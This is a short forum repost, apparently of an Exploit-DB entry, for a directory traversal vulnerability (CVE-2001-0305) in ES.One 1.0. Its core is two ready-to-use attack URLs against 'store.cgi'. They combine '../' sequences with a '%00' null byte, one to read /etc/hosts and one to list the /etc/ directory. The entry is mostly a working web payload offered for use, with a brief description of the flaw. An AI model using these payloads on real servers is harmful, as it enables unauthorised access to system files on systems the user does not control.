Exploit thinking arts es.one 1.0 - Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20636
Проверка EDB
  1. Пройдено
Автор
SLIPY
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-2001-0305
Дата публикации
2001-02-16
Код:
source: https://www.securityfocus.com/bid/2385/info

It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory. 

http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html

^^ = Will obviously open the hosts file.

http://target/cgi-bin/store.cgi?StartID=../etc/%00.html

^^ = Will obviously list the /etc/ directory.
 
Источник
www.exploit-db.com

Похожие темы